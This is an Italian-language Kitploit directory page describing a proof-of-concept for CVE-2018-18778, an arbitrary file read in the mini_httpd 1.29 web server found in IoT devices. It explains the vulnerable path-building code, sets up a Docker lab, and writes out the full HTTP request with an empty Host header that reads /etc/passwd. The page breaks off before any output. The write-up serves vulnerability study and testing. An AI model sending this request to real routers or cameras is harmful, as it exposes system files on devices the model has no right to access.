Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Mini_httpd-CVE-2018-18778 — PoC exploit per CVE-2018-18778: lettura arbitraria di file in mini_httpd 1.29 tramite header Host vuoto, che colpisce dispositivi IoT di Huawei, Zyxel e altri. | Kitploit
Strumenti/GitHubGitHub/cyberharsh/mini_httpd-cve-2018-18778
Sicurezza Sistemi EmbeddedSicurezza IoTAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebFuzzing
GitHubcyberharsh/mini_httpd-cve-2018-18778

Mini_httpd-CVE-2018-18778

PoC exploit per CVE-2018-18778: lettura arbitraria di file in mini_httpd 1.29 tramite header Host vuoto, che colpisce dispositivi IoT di Huawei, Zyxel e altri.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
6 anni faNon ancora revisionato

Vulnerabilità di lettura arbitraria dei file in mini_httpd (CVE-2018-18778)

Mini_httpd è un server HTTP miniaturizzato che, pur occupando poche risorse di sistema, mantiene un certo livello di prestazioni (circa il 90% di Apache). Per questo motivo è ampiamente utilizzato come server embedded in vari dispositivi IoT (router, switch, telecamere, ecc.). Tra i produttori che hanno impiegato il componente mini_httpd nei loro dispositivi figurano Huawei, Zyxel, Hikvision, Raspberry Pi e altri.

Quando mini_httpd è in esecuzione in modalità host virtuale, la richiesta dell'utente a http://HOST/FILE accederà al file HOST/FILE nella directory corrente.

root@kitploit:~
(void) snprintf( vfile, sizeof(vfile), "%s/%s", req_hostname, f );

Vedi il codice sopra, analisi come segue:

  • Quando HOST=example.com e FILE=index.html, il risultato dell'istruzione sopra è example.com/index.html, il file viene letto normalmente.
  • Quando HOST è vuoto e FILE=etc/passwd, il risultato dell'istruzione sopra è /etc/passwd.

Quest'ultimo viene interpretato come percorso assoluto, quindi viene letto /etc/passwd, causando una vulnerabilità di lettura arbitraria dei file.

Configurazione dell'ambiente

Esegui il seguente comando per avviare mini_httpd 1.29:

root@kitploit:~
docker-compose up -d

Una volta avviato l'ambiente, visita http://your-ip:8080 per visualizzare la pagina web.

Riproduzione della vulnerabilità

Invia la richiesta impostando Host vuoto e PATH con il percorso assoluto del file:

root@kitploit:~
GET /etc/passwd HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close


Lettura riuscita del file:

Scarica lo strumento